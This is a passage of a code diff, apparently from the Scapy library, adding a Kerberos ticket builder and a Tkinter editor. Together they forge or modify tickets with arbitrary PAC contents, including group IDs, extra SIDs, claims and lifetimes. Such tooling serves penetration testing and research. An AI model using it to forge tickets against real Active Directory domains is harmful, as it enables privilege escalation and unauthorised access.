extra_sids = kwargs.get("extra_sids", None) + if extra_sids is None: + extra_sids = self._prompt("Extra SIDs [] :") or [] + if extra_sids: + extra_sids = [x.strip() for x in extra_sids.split(",")] + duration = kwargs.get( + "duration", int(self._prompt("Expires in (h) [10]: ") or "10") + ) + now_time = datetime.utcnow().replace(microsecond=0, tzinfo=timezone.utc) + rand = random.SystemRandom() + key = Key.random_to_key(EncryptionType.AES256_CTS_HMAC_SHA1_96, rand.randbytes(32)) + store = { + # KRB + "flags": ASN1_BIT_STRING("01000000111000010000000000000000"), + "key": { + "keytype": ASN1_INTEGER(key.etype), + "keyvalue": ASN1_STRING(key.key), + }, + "crealm": ASN1_GENERAL_STRING(domain), + "cname": { + "nameString": [ASN1_GENERAL_STRING(user)], + "nameType": ASN1_INTEGER(1), + }, + "authtime": ASN1_GENERALIZED_TIME(now_time), + "starttime": ASN1_GENERALIZED_TIME(now_time + timedelta(hours=duration)), + "endtime": ASN1_GENERALIZED_TIME(now_time + timedelta(hours=duration)), + "renewTill": ASN1_GENERALIZED_TIME(now_time + timedelta(hours=duration)), + # PAC + # Validation info + "VI.LogonTime": self._time_to_filetime(now_time.timestamp()), + "VI.LogoffTime": self._time_to_filetime("NEVER"), + "VI.KickOffTime": self._time_to_filetime("NEVER"), + "VI.PasswordLastSet": self._time_to_filetime( + (now_time - timedelta(hours=10)).timestamp() + ), + "VI.PasswordCanChange": self._time_to_filetime(0), + "VI.PasswordMustChange": self._time_to_filetime("NEVER"), + "VI.EffectiveName": user, + "VI.FullName": "", + "VI.LogonScript": "", + "VI.ProfilePath": "", + "VI.HomeDirectory": "", + "VI.HomeDirectoryDrive": "", + "VI.UserSessionKey": b"\x00" * 16, + "VI.LogonServer": "", + "VI.LogonDomainName": domain.rsplit(".", 1)[0], + "VI.LogonCount": 70, + "VI.BadPasswordCount": 0, + "VI.UserId": user_id, + "VI.PrimaryGroupId": primary_group_id, + "VI.GroupIds": [ + { + "RelativeId": x, + "Attributes": 7, + } + for x in group_ids + ], + "VI.UserFlags": 32, + "VI.LogonDomainId": domain_sid, + "VI.UserAccountControl": 128, + "VI.ExtraSids": [{"Sid": x, "Attributes": 7} for x in extra_sids], + "VI.ResourceGroupDomainSid": None, + "VI.ResourceGroupIds": [], + # Pac Client infos + "CI.ClientId": self._utc_to_mstime(now_time.timestamp()), + "CI.Name": user, + # UPN DNS Info + "UPNDNS.Flags": 3, + "UPNDNS.Upn": "%s@%s" % (user, domain.lower()), + "UPNDNS.DnsDomainName": domain.upper(), + "UPNDNS.SamName": user, + "UPNDNS.Sid": "%s-%s" % (domain_sid, user_id), + # Client Claims + "CC.ClaimsArrays": [ + { + "ClaimsSourceType": 1, + "ClaimEntries": [ + { + "Id": "ad://ext/AuthenticationSilo", + "Type": 3, + "StringValues": "T0-silo", + } + ], + } + ], + # Attributes Info + "AI.Flags": "PAC_WAS_REQUESTED", + # Requestor + "REQ.Sid": "%s-%s" % (domain_sid, user_id), + # Server Checksum + "SC.SignatureType": 16, + "SC.Signature": b"\x00" * 12, + "SC.RODCIdentifier": b"", + # KDC Checksum + "KC.SignatureType": 16, + "KC.Signature": b"\x00" * 12, + "KC.RODCIdentifier": b"", + # Ticket Checksum + "TKT.SignatureType": -1, + "TKT.Signature": b"\x00" * 12, + "TKT.RODCIdentifier": b"", + # Extended KDC Checksum + "EXKC.SignatureType": -1, + "EXKC.Signature": b"\x00" * 12, + "EXKC.RODCIdentifier": b"", + } + # Build & store ticket + tkt = self._build_ticket(store) + self._add_cred(tkt) + + def _build_sid(self, sidstr, msdn=False): + if not sidstr: + return None + m = re.match(r"S-(\d+)-(\d+)-?((?:\d+-?)*)", sidstr.strip()) + if not m: + raise ValueError("Invalid SID format: %s" % sidstr) + subauthors = [] + if m.group(3): + subauthors = [int(x) for x in m.group(3).split("-")] + if msdn: + return WINNT_SID( + Revision=int(m.group(1)), + IdentifierAuthority=WINNT_SID_IDENTIFIER_AUTHORITY( + Value=struct.pack(">Q", int(m.group(2)))[2:], + ), + SubAuthority=subauthors, + ) + else: + return SID( + Revision=int(m.group(1)), + IdentifierAuthority=RPC_SID_IDENTIFIER_AUTHORITY( + Value=struct.pack(">Q", int(m.group(2)))[2:] + ), + SubAuthority=subauthors, + ) + + def _build_ticket(self, store): + if store["CC.ClaimsArrays"]: + claimSet = CLAIMS_SET( + ndr64=False, + ClaimsArrays=[ + CLAIMS_ARRAY( + usClaimsSourceType=ca["ClaimsSourceType"], + ClaimEntries=[ + CLAIM_ENTRY( + Id=ce["Id"], + Type=ce["Type"], + Values=NDRUnion( + tag=ce["Type"], + value=CLAIM_ENTRY_sub2( + ValueCount=ce["StringValues"].count(";") + 1, + StringValues=ce["StringValues"].split(";"), + ), + ), + ) + for ce in ca["ClaimEntries"] + ], + ) + for ca in store["CC.ClaimsArrays"] + ], + usReservedType=0, + ulReservedFieldSize=0, + ReservedField=None, + ) + else: + claimSet = None + _signature_set = lambda x: store[x + ".SignatureType"] != -1 + return EncTicketPart( + transited=TransitedEncoding( + trType=ASN1_INTEGER(0), contents=ASN1_STRING(b"") + ), + addresses=None, + flags=store["flags"], + key=EncryptionKey( + keytype=store["key"]["keytype"], + keyvalue=store["key"]["keyvalue"], + ), + crealm=store["crealm"], + cname=PrincipalName( + nameString=store["cname"]["nameString"], + nameType=store["cname"]["nameType"], + ), + authtime=store["authtime"], + starttime=store["starttime"], + endtime=store["endtime"], + renewTill=store["renewTill"], + authorizationData=AuthorizationData( + seq=[ + AuthorizationDataItem( + adType=ASN1_INTEGER(1), + adData=AuthorizationData( + seq=[ + AuthorizationDataItem( + adType="AD-WIN2K-PAC", + adData=PACTYPE( + Buffers=[ + PAC_INFO_BUFFER( + ulType="Logon information", + ), + ] + + ( + [ + PAC_INFO_BUFFER( + ulType="Server Signature", + ), + ] + if _signature_set("SC") + else [] + ) + + ( + [ + PAC_INFO_BUFFER( + ulType="KDC Signature", + ), + ] + if _signature_set("KC") + else [] + ) + + [ + PAC_INFO_BUFFER( + ulType="Client name and ticket information", + ), + PAC_INFO_BUFFER( + ulType="UPN and DNS information", + ), + ] + + ( + [ + PAC_INFO_BUFFER( + ulType="Client claims information", + ), + ] + if claimSet + else [] + ) + + ( + [ + PAC_INFO_BUFFER( + ulType="PAC Attributes", + ), + ] + if store["AI.Flags"] + else [] + ) + + ( + [ + PAC_INFO_BUFFER( + ulType="PAC Requestor", + ), + ] + if store["REQ.Sid"] + else [] + ) + + ( + [ + PAC_INFO_BUFFER( + ulType="Ticket Signature", + ), + ] + if _signature_set("TKT") + else [] + ) + + ( + [ + PAC_INFO_BUFFER( + ulType="Extended KDC Signature", + ), + ] + if _signature_set("EXKC") + else [] + ), + Payloads=[ + KERB_VALIDATION_INFO( + ndr64=False, + ndrendian="little", + LogonTime=store["VI.LogonTime"], + LogoffTime=store["VI.LogoffTime"], + KickOffTime=store["VI.KickOffTime"], + PasswordLastSet=store[ + "VI.PasswordLastSet" + ], + PasswordCanChange=store[ + "VI.PasswordCanChange" + ], + PasswordMustChange=store[ + "VI.PasswordMustChange" + ], + EffectiveName=RPC_UNICODE_STRING( + Buffer=store["VI.EffectiveName"], + ), + FullName=RPC_UNICODE_STRING( + Buffer=store["VI.FullName"], + ), + LogonScript=RPC_UNICODE_STRING( + Buffer=store["VI.LogonScript"], + ), + ProfilePath=RPC_UNICODE_STRING( + Buffer=store["VI.ProfilePath"], + ), + HomeDirectory=RPC_UNICODE_STRING( + Buffer=store["VI.HomeDirectory"], + ), + HomeDirectoryDrive=RPC_UNICODE_STRING( + Buffer=store[ + "VI.HomeDirectoryDrive" + ], + ), + UserSessionKey=USER_SESSION_KEY( + data=[ + CYPHER_BLOCK( + data=store[ + "VI.UserSessionKey" + ][:8] + ), + CYPHER_BLOCK( + data=store[ + "VI.UserSessionKey" + ][8:] + ), + ] + ), + LogonServer=RPC_UNICODE_STRING( + Buffer=store["VI.LogonServer"], + ), + LogonDomainName=RPC_UNICODE_STRING( + Buffer=store["VI.LogonDomainName"], + ), + LogonCount=store["VI.LogonCount"], + BadPasswordCount=store[ + "VI.BadPasswordCount" + ], + UserId=store["VI.UserId"], + PrimaryGroupId=store[ + "VI.PrimaryGroupId" + ], + GroupIds=[ + GROUP_MEMBERSHIP( + RelativeId=x["RelativeId"], + Attributes=x["Attributes"], + ) + for x in store["VI.GroupIds"] + ], + UserFlags=store["VI.UserFlags"], + LogonDomainId=self._build_sid( + store["VI.LogonDomainId"] + ), + Reserved1=[0, 0], + UserAccountControl=store[ + "VI.UserAccountControl" + ], + Reserved3=[0, 0, 0, 0, 0, 0, 0], + ExtraSids=[ + KERB_SID_AND_ATTRIBUTES( + Sid=self._build_sid(x["Sid"]), + Attributes=x["Attributes"], + ) + for x in store["VI.ExtraSids"] + ] + if store["VI.ExtraSids"] + else None, + ResourceGroupDomainSid=self._build_sid( + store["VI.ResourceGroupDomainSid"] + ), + ResourceGroupIds=[ + GROUP_MEMBERSHIP( + RelativeId=x["RelativeId"], + Attributes=x["Attributes"], + ) + for x in store[ + "VI.ResourceGroupIds" + ] + ] + if store["VI.ResourceGroupIds"] + else None, + ), + ] + + ( + [ + PAC_SIGNATURE_DATA( + SignatureType=store[ + "SC.SignatureType" + ], + Signature=store["SC.Signature"], + RODCIdentifier=store[ + "SC.RODCIdentifier" + ], + ), + ] + if _signature_set("SC") + else [] + ) + + ( + [ + PAC_SIGNATURE_DATA( + SignatureType=store[ + "KC.SignatureType" + ], + Signature=store["KC.Signature"], + RODCIdentifier=store[ + "KC.RODCIdentifier" + ], + ), + ] + if _signature_set("KC") + else [] + ) + + [ + PAC_CLIENT_INFO( + ClientId=store["CI.ClientId"], + Name=store["CI.Name"], + ), + UPN_DNS_INFO( + Flags=store["UPNDNS.Flags"], + Payload=[ + ( + "Upn", + store["UPNDNS.Upn"], + ), + ( + "DnsDomainName", + store["UPNDNS.DnsDomainName"], + ), + ( + "SamName", + store["UPNDNS.SamName"], + ), + ( + "Sid", + self._build_sid( + store["UPNDNS.Sid"], + msdn=True, + ), + ), + ], + ), + ] + + ( + [ + PAC_CLIENT_CLAIMS_INFO( + ndr64=False, + Claims=CLAIMS_SET_METADATA( + ClaimsSet=[ + claimSet, + ], + usCompressionFormat=0, + usReservedType=0, + ulReservedFieldSize=0, + ReservedField=None, + ), + ), + ] + if claimSet + else [] + ) + + ( + [ + PAC_ATTRIBUTES_INFO( + Flags=[store["AI.Flags"]], + FlagsLength=2, + ) + ] + if store["AI.Flags"] + else [] + ) + + ( + [ + PAC_REQUESTOR( + Sid=self._build_sid( + store["REQ.Sid"], msdn=True + ), + ), + ] + if store["REQ.Sid"] + else [] + ) + + ( + [ + PAC_SIGNATURE_DATA( + SignatureType=store[ + "TKT.SignatureType" + ], + Signature=store["TKT.Signature"], + RODCIdentifier=store[ + "TKT.RODCIdentifier" + ], + ), + ] + if _signature_set("TKT") + else [] + ) + + ( + [ + PAC_SIGNATURE_DATA( + SignatureType=store[ + "EXKC.SignatureType" + ], + Signature=store["EXKC.Signature"], + RODCIdentifier=store[ + "EXKC.RODCIdentifier" + ], + ) + ] + if _signature_set("EXKC") + else [] + ), + ), + ) + ] + ), + ) + ] + ), + ) + + def _getPayloadIfExist(self, pac, ulType): + for i, buf in enumerate(pac.Buffers): + if buf.ulType == ulType: + return pac.Payloads[i] + return None + + def _make_fields(self, element, fields, datastore=None): + frm = ttk.Frame(element) + frm.pack(fill="x") + for i, fld in enumerate(fields): + (self._data if datastore is None else datastore)[fld[0]] = v = tk.StringVar( + frm, value=fld[1] + ) + ttk.Label(frm, text=fld[0]).grid(row=i, column=0, sticky="w") + ttk.Entry(frm, textvariable=v).grid(row=i, column=1, sticky="e") + frm.grid_columnconfigure(1, weight=1) + + def _make_checkbox(self, element, keys, flags, datastore): + for flg in keys: + datastore[flg] = v = tk.BooleanVar(value=flg in flags) + tk.Checkbutton(element, text=flg, variable=v, anchor=tk.W).pack( + fill="x", padx=5, pady=1 + ) + + def _make_table(self, element, name, headers, lst, datastore=None): + wrap = ttk.LabelFrame(element, text=name) + tree = ttk.Treeview(wrap, column=headers, show="headings", height=4) + vsb = ttk.Scrollbar(wrap, orient="vertical", command=tree.yview) + vsb.pack(side="right", fill="y") + tree.configure(yscrollcommand=vsb.set) + for h in headers: + tree.column(h, anchor=tk.CENTER) + tree.heading(h, text=h) + for i, row in enumerate(lst): + tree.insert(parent="", index="end", iid=i, values=row) + tree.pack(fill="x", padx=10, pady=10) + + def _update_datastore(): + children = [tree.item(x, "values") for x in tree.get_children()] + (self._data if datastore is None else datastore)[name] = children + + _update_datastore() + + class EditDialog(tksd.Dialog): + def __init__(self, *args, **kwargs): + self.data = {} + self.initial_values = kwargs.pop("values", {}) + self.success = False + super(EditDialog, self).__init__(*args, **kwargs) + + def body(diag, frame): + self._make_fields( + frame, + [(x, diag.initial_values.get(x, "")) for x in headers], + datastore=diag.data, + ) + return frame + + def ok(self, *args, **kwargs): + self.success = True + super(EditDialog, self).ok(*args, **kwargs) + + def values(self): + return tuple(x.get() for x in self.data.values()) + + def add(): + dialog = EditDialog(title="Add", parent=tree) + if dialog.success: + i = len(tree.get_children()) + tree.insert(parent="", index="end", iid=i, values=dialog.values()) + _update_datastore() + + def edit(): + selected = tree.focus() + if not selected: + return + values = dict(zip(headers, tree.item(selected, "values"))) + dialog = EditDialog(title="Edit", parent=tree, values=values) + if dialog.success: + tree.item(selected, values=dialog.values()) + _update_datastore() + + def remove(): + selected = tree.focus() + if selected: + tree.delete(selected) + _update_datastore() + + btns = ttk.Frame(wrap) + ttk.Button(btns, text="Add", command=add).grid(row=0, column=0, padx=10) + ttk.Button(btns, text="Edit", command=edit).grid(row=0, column=1, padx=10) + ttk.Button(btns, text="Remove", command=remove).grid(row=0, column=2, padx=10) + btns.pack() + wrap.pack(fill="x") + + def _make_list(self, element, func, key, fields_list, new_values): + tbl = ttk.Frame(element) + tbl.pack() + + self._data[key] = data = collections.defaultdict(dict) + + def append(val): + i = tbl.grid_size()[1] + elt = ttk.Frame(tbl, style="BorderFrame.TFrame") + elt.grid(padx=10, pady=10, row=i, column=0) + func(elt, val, data[i]) + + for val in fields_list: + append(val) + + def add(): + append(new_values.copy()) + + def delete(): + slavescount = len(tbl.grid_slaves()) + i = tksd.askinteger( + "Delete", + "Input the index of the Claim to delete [0-%s]" % (slavescount - 1), + parent=tbl, + ) + if i is None or i > slavescount - 1: + return + tbl.grid_slaves(row=i, column=0)[0].destroy() + del data[i] + + btns = ttk.Frame(element) + ttk.Button(btns, text="Add", command=add).grid(row=0, column=0, padx=10) + ttk.Button(btns, text="Delete", command=delete).grid(row=0, column=1, padx=10) + btns.pack() + + _TIME_FIELD = UTCTimeField( + "", + None, + fmt="> 32) & 0xFFFFFFFF, + dwLowDateTime=x & 0xFFFFFFFF, + ) + + def _filetime_totime(self, x): + if x.dwHighDateTime == 0x7FFFFFFF and x.dwLowDateTime == 0xFFFFFFFF: + return "NEVER" + return self._pretty_time((x.dwHighDateTime << 32) + x.dwLowDateTime) + + def _pretty_sid(self, sid): + if not sid or not sid.IdentifierAuthority.Value: + return "" + return sid.summary() + + def _getLogonInformation(self, pac, element): + logonInfo = self._getPayloadIfExist(pac, 0x00000001) + if not logonInfo: + pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000001)) + logonInfo = KERB_VALIDATION_INFO() + else: + logonInfo = logonInfo.value + self._make_fields( + element, + [ + ("LogonTime", self._filetime_totime(logonInfo.LogonTime)), + ("LogoffTime", self._filetime_totime(logonInfo.LogoffTime)), + ("KickOffTime", self._filetime_totime(logonInfo.KickOffTime)), + ( + "PasswordLastSet", + self._filetime_totime(logonInfo.PasswordLastSet), + ), + ( + "PasswordCanChange", + self._filetime_totime(logonInfo.PasswordCanChange), + ), + ( + "PasswordMustChange", + self._filetime_totime(logonInfo.PasswordMustChange), + ), + ( + "EffectiveName", + logonInfo.EffectiveName.Buffer.value.value[0].value.decode(), + ), + ( + "FullName", + logonInfo.FullName.Buffer.value.value[0].value.decode(), + ), + ( + "LogonScript", + logonInfo.LogonScript.Buffer.value.value[0].value.decode(), + ), + ( + "ProfilePath", + logonInfo.ProfilePath.Buffer.value.value[0].value.decode(), + ), + ( + "HomeDirectory", + logonInfo.HomeDirectory.Buffer.value.value[0].value.decode(), + ), + ( + "HomeDirectoryDrive", + logonInfo.HomeDirectoryDrive.Buffer.value.value[0].value.decode(), + ), + ("LogonCount", str(logonInfo.LogonCount)), + ("BadPasswordCount", str(logonInfo.BadPasswordCount)), + ("UserId", str(logonInfo.UserId)), + ("PrimaryGroupId", str(logonInfo.PrimaryGroupId)), + ], + ) + self._make_table( + element, + "GroupIds", + ["RelativeId", "Attributes"], + [ + (str(x.RelativeId), str(x.Attributes)) + for x in logonInfo.GroupIds.value.value + ], + ) + self._make_fields( + element, + [ + ("UserFlags", str(logonInfo.UserFlags)), + ( + "UserSessionKey", + bytes_hex( + b"".join(x.data for x in logonInfo.UserSessionKey.data) + ).decode(), + ), + ( + "LogonServer", + logonInfo.LogonServer.Buffer.value.value[0].value.decode(), + ), + ( + "LogonDomainName", + logonInfo.LogonDomainName.Buffer.value.value[0].value.decode(), + ), + ( + "LogonDomainId", + self._pretty_sid(logonInfo.LogonDomainId.value), + ), + ("UserAccountControl", str(logonInfo.UserAccountControl)), + ], + ) + self._make_table( + element, + "ExtraSids", + ["Sid", "Attributes"], + [ + (self._pretty_sid(x.Sid.value), str(x.Attributes)) + for x in ( + logonInfo.ExtraSids.value.value if logonInfo.ExtraSids else [] + ) + ], + ) + self._make_fields( + element, + [ + ( + "ResourceGroupDomainSid", + self._pretty_sid( + logonInfo.ResourceGroupDomainSid.value + if logonInfo.ResourceGroupDomainSid + else None + ), + ), + ], + ) + self._make_table( + element, + "ResourceGroupIds", + ["RelativeId", "Attributes"], + [ + (str(x.RelativeId), str(x.Attributes)) + for x in ( + logonInfo.ResourceGroupIds.value.value + if logonInfo.ResourceGroupIds + else [] + ) + ], + ) + + def _getClientInfo(self, pac, element): + clientInfo = self._getPayloadIfExist(pac, 0x0000000A) + if not clientInfo: + pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x0000000A)) + clientInfo = PAC_CLIENT_INFO() + return self._make_fields( + element, + [ + ("ClientId", self._pretty_time(clientInfo.ClientId)), + ("Name", clientInfo.Name), + ], + ) + + def _getUPNDnsInfo(self, pac, element): + upndnsinfo = self._getPayloadIfExist(pac, 0x0000000C) + if not upndnsinfo: + pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x0000000C)) + upndnsinfo = UPN_DNS_INFO() + return self._make_fields( + element, + [ + ("Upn", upndnsinfo.Upn), + ("DnsDomainName", upndnsinfo.DnsDomainName), + ( + "SamName", + upndnsinfo.SamName + if upndnsinfo.Flags.S and upndnsinfo.SamNameLen + else "", + ), + ( + "UpnDnsSid", + self._pretty_sid(upndnsinfo.Sid) + if upndnsinfo.Flags.S and upndnsinfo.SidLen + else "", + ), + ], + ) + + def _getClientClaims(self, pac, element): + clientClaims = self._getPayloadIfExist(pac, 0x0000000D) + if not clientClaims or isinstance(clientClaims, conf.padding_layer): + pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x0000000D)) + claimsArray = [] + else: + claimsArray = ( + clientClaims.value.valueof("Claims") + .valueof("ClaimsSet") + .value.valueof("ClaimsArrays") + ) + + def func(elt, x, datastore): + self._make_fields( + elt, + [ + ("ClaimsSourceType", str(x.usClaimsSourceType)), + ], + datastore=datastore, + ) + self._make_table( + elt, + "ClaimEntries", + ["Id", "Type", "Values"], + [ + ( + y.valueof("Id").decode(), + str(y.Type), + ";".join( + z.decode() + for z in y.valueof("Values").valueof("StringValues") + ), + ) + for y in x.valueof("ClaimEntries") + ], + datastore=datastore, + ) + + return self._make_list( + element, + func=func, + key="ClaimsArrays", + fields_list=claimsArray, + new_values=CLAIMS_ARRAY(ClaimEntries=[]), + ) + + def _getPACAttributes(self, pac, element): + pacAttributes = self._getPayloadIfExist(pac, 0x00000011) + if not pacAttributes: + pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000011)) + pacAttributes = PAC_ATTRIBUTES_INFO(Flags=0) + flags = str(pacAttributes.Flags[0]).split("+") + self._data["pacAttributes"] = {} + self._make_checkbox( + element, + [ + "PAC_WAS_REQUESTED", + "PAC_WAS_GIVEN_IMPLICITLY", + ], + flags, + self._data["pacAttributes"], + ) + + def _getPACRequestor(self, pac, element): + pacRequestor = self._getPayloadIfExist(pac, 0x00000012) + if not pacRequestor: + pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000012)) + pacRequestor = PAC_REQUESTOR() + return self._make_fields( + element, [("ReqSid", self._pretty_sid(pacRequestor.Sid))] + ) + + def _getServerChecksum(self, pac, element): + serverChecksum = self._getPayloadIfExist(pac, 0x00000006) + if not serverChecksum: + pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000006)) + serverChecksum = PAC_SIGNATURE_DATA() + return self._make_fields( + element, + [ + ( + "SRVSignatureType", + str(serverChecksum.SignatureType) + if serverChecksum.SignatureType is not None + else "", + ), + ("SRVSignature", bytes_hex(serverChecksum.Signature).decode()), + ("SRVRODCIdentifier", serverChecksum.RODCIdentifier.decode()), + ], + ) + + def _getKDCChecksum(self, pac, element): + kdcChecksum = self._getPayloadIfExist(pac, 0x00000007) + if not kdcChecksum: + pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000007)) + kdcChecksum = PAC_SIGNATURE_DATA() + return self._make_fields( + element, + [ + ( + "KDCSignatureType", + str(kdcChecksum.SignatureType) + if kdcChecksum.SignatureType is not None + else "", + ), + ("KDCSignature", bytes_hex(kdcChecksum.Signature).decode()), + ("KDCRODCIdentifier", kdcChecksum.RODCIdentifier.decode()), + ], + ) + + def _getTicketChecksum(self, pac, element): + ticketChecksum = self._getPayloadIfExist(pac, 0x00000010) + if not ticketChecksum: + pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000010)) + ticketChecksum = PAC_SIGNATURE_DATA() + return self._make_fields( + element, + [ + ( + "TKTSignatureType", + str(ticketChecksum.SignatureType) + if ticketChecksum.SignatureType is not None + else "", + ), + ("TKTSignature", bytes_hex(ticketChecksum.Signature).decode()), + ("TKTRODCIdentifier", ticketChecksum.RODCIdentifier.decode()), + ], + ) + + def _getExtendedKDCChecksum(self, pac, element): + exkdcChecksum = self._getPayloadIfExist(pac, 0x00000013) + if not exkdcChecksum: + pac.Buffers.append(PAC_INFO_BUFFER(ulType=0x00000013)) + exkdcChecksum = PAC_SIGNATURE_DATA() + return self._make_fields( + element, + [ + ( + "EXKDCSignatureType", + str(exkdcChecksum.SignatureType) + if exkdcChecksum.SignatureType is not None + else "", + ), + ("EXKDCSignature", bytes_hex(exkdcChecksum.Signature).decode()), + ("EXKDCRODCIdentifier", exkdcChecksum.RODCIdentifier.decode()), + ], + ) + + def edit_ticket(self, i, key=None, hash=None): + """ + Edit a Kerberos ticket using the GUI + """ + tkt = self.dec_ticket(i, key=key, hash=hash) + pac = tkt.authorizationData.seq[0].adData[0].seq[0].adData + + # WIDTH, HEIGHT = 1120, 1000 + + # Note: for TK doc, use https://tkdocs.com + + # Root + root = tk.Tk() + root.title("Ticketer++ (@secdev/scapy)") + # root.geometry("%sx%s" % (WIDTH, HEIGHT)) + # root.resizable(0, 1) + + scrollFrame = ScrollFrame(root) + frm = scrollFrame.viewPort + + tk_ticket = ttk.Frame(frm, padding=5) + tk_pac = ttk.Frame(frm, padding=5) + + ttk.Button(frm, text="Quit", command=root.destroy).grid( + column=0, row=1, columnspan=2 + ) + + # TTK style + + ttkstyle = ttk.Style() + ttkstyle.theme_use("alt") + ttkstyle.configure( + "BorderFrame.TFrame", + relief="groove", + borderwidth=3, + ) + + # MAIN TICKET + + # Flags + tk_flags = ttk.LabelFrame( + tk_ticket, + text="Flags", + style="BorderFrame.TFrame", + ) + tk_flags.pack(fill="x", pady=5) + flags = tkt.get_field("flags").get_flags(tkt) + self._data["flags"] = {} + self._make_checkbox(tk_flags, _TICKET_FLAGS, flags, self._data["flags"]) + + # Key + tk_key = ttk.LabelFrame( + tk_ticket, + text="key", + style="BorderFrame.TFrame", + ) + tk_key.pack(fill="x", pady=5) + self._make_fields( + tk_key, + [ + ("keytype", str(tkt.key.keytype.val)), + ( + "keyvalue", + bytes_hex(tkt.key.keyvalue.val).decode(), + ), + ], + ) + + # crealm + self._make_fields(tk_ticket, [("crealm", tkt.crealm.val.decode())]) + + # cname + tk_cname = ttk.LabelFrame( + tk_ticket, + text="cname", + style="BorderFrame.TFrame", + ) + tk_cname.pack(fill="x", pady=5) + self._make_fields( + tk_cname, + [ + ( + "nameType", + str(tkt.cname.nameType.val), + ), + ], + ) + self._make_table( + tk_cname, + "nameString", + ["Value"], + [(x.val.decode(),) for x in tkt.cname.nameString], + ) + + # transited + tk_transited = ttk.LabelFrame( + tk_ticket, + text="transited", + style="BorderFrame.TFrame", + ) + tk_transited.pack(fill="x", pady=5) + self._make_fields( + tk_transited, + [ + # + ( + "trType", + str(tkt.transited.trType.val), + ), + ( + "contents", + tkt.transited.contents.val.decode(), + ), + ], + ) + + # times + self._make_fields( + tk_ticket, + [ + ("authtime", tkt.authtime.pretty_time.rstrip(" UTC")), + ("starttime", tkt.starttime.pretty_time.rstrip(" UTC")), + ("endtime", tkt.endtime.pretty_time.rstrip(" UTC")), + ("renewTill", tkt.renewTill.pretty_time.rstrip(" UTC")), + ], + ) + + # PAC + + # Logon information + tk_logoninfo = ttk.LabelFrame( + tk_pac, + text="Logon information", + style="BorderFrame.TFrame", + ) + tk_logoninfo.pack(fill="x", pady=5) + self._getLogonInformation(pac, tk_logoninfo) + + # Client name and ticket information + tk_clientinfo = ttk.LabelFrame( + tk_pac, + text="Client name and ticket information", + style="BorderFrame.TFrame", + ) + tk_clientinfo.pack(fill="x", pady=5) + self._getClientInfo(pac, tk_clientinfo) + + # UPN and DNS information + tk_upndnsinfo = ttk.LabelFrame( + tk_pac, + text="UPN and DNS information", + style="BorderFrame.TFrame", + ) + tk_upndnsinfo.pack(fill="x", pady=5) + self._getUPNDnsInfo(pac, tk_upndnsinfo) + + # Client claims information + tk_clientclaims = ttk.LabelFrame( + tk_pac, + text="Client claims information", + style="BorderFrame.TFrame", + ) + tk_clientclaims.pack(fill="x", pady=5) + self._getClientClaims(pac, tk_clientclaims) + + # PAC Attributes + tk_pacattributes = ttk.LabelFrame( + tk_pac, + text="PAC Attributes", + style="BorderFrame.TFrame", + ) + tk_pacattributes.pack(fill="x", pady=5) + self._getPACAttributes(pac, tk_pacattributes) + + # PAC Requestor + tk_pacrequestor = ttk.LabelFrame( + tk_pac, + text="PAC Requestor", + style="BorderFrame.TFrame", + ) + tk_pacrequestor.pack(fill="x", pady=5) + self._getPACRequestor(pac, tk_pacrequestor) + + # Server checksum + tk_serverchksum = ttk.LabelFrame( + tk_pac, + text="Server checksum", + style="BorderFrame.TFrame", + ) + tk_serverchksum.pack(fill="x", pady=5) + self._getServerChecksum(pac, tk_serverchksum) + + # KDC checksum + tk_serverchksum = ttk.LabelFrame( + tk_pac, + text="KDC checksum", + style="BorderFrame.TFrame", + ) + tk_serverchksum.pack(fill="x", pady=5) + self._getKDCChecksum(pac, tk_serverchksum) + + # Ticket checksum + tk_serverchksum = ttk.LabelFrame( + tk_pac, + text="Ticket checksum", + style="BorderFrame.TFrame", + ) + tk_serverchksum.pack(fill="x", pady=5) + self._getTicketChecksum(pac, tk_serverchksum) + + # Extended KDC checksum + tk_serverchksum = ttk.LabelFrame( + tk_pac, + text="Extended KDC checksum", + style="BorderFrame.TFrame", + ) + tk_serverchksum.pack(fill="x", pady=5) + self._getExtendedKDCChecksum(pac, tk_serverchksum) + + # Run + + tk_ticket.grid(column=0, row=0, sticky=tk.N) + tk_pac.grid(column=1, row=0, sticky=tk.N) + + scrollFrame.pack(side="top", fill="both", expand=True) + root.mainloop() + + # Rebuild + store = { + # KRB + "flags": ASN1_BIT_STRING( + "".join( + "1" if self._data["flags"][x].get() else "0" for x in _TICKET_FLAGS + ) + + "0" * (-len(_TICKET_FLAGS) % 32) + ), + "key": { + "keytype": ASN1_INTEGER(int(self._data["keytype"].get())), + "keyvalue": ASN1_STRING(hex_bytes(self._data["keyvalue"].get())), + }, + "crealm": ASN1_GENERAL_STRING(self._data["crealm"].get()), + "cname": { + "nameString": [ + ASN1_GENERAL_STRING(x[0]) for x in self._data["nameString"] + ], + "nameType": ASN1_INTEGER(int(self._data["nameType"].get())), + }, + "authtime": self._time_to_asn1(self._data["authtime"].get()), + "starttime": self._time_to_asn1(self._data["starttime"].get()), + "endtime": self._time_to_asn1(self._data["endtime"].get()), + "renewTill": self._time_to_asn1(self._data["renewTill"].get()), + # PAC + # Validation info + "VI.LogonTime": self._time_to_filetime(self._data["LogonTime"].get()), + "VI.LogoffTime": self._time_to_filetime(self._data["LogoffTime"].get()), + "VI.KickOffTime": self._time_to_filetime(self._data["KickOffTime"].get()), + "VI.PasswordLastSet": self._time_to_filetime( + self._data["PasswordLastSet"].get() + ), + "VI.PasswordCanChange": self._time_to_filetime( + self._data["PasswordCanChange"].get() + ), + "VI.PasswordMustChange": self._time_to_filetime( + self._data["PasswordMustChange"].get() + ), + "VI.EffectiveName": self._data["EffectiveName"].get(), + "VI.FullName": self._data["FullName"].get(), + "VI.LogonScript": self._data["LogonScript"].get(), + "VI.ProfilePath": self._data["ProfilePath"].get(), + "VI.HomeDirectory": self._data["HomeDirectory"].get(), + "VI.HomeDirectoryDrive": self._data["HomeDirectoryDrive"].get(), + "VI.UserSessionKey": hex_bytes(self._data["UserSessionKey"].get()), + "VI.LogonServer": self._data["LogonServer"].get(), + "VI.LogonDomainName": self._data["LogonDomainName"].get(), + 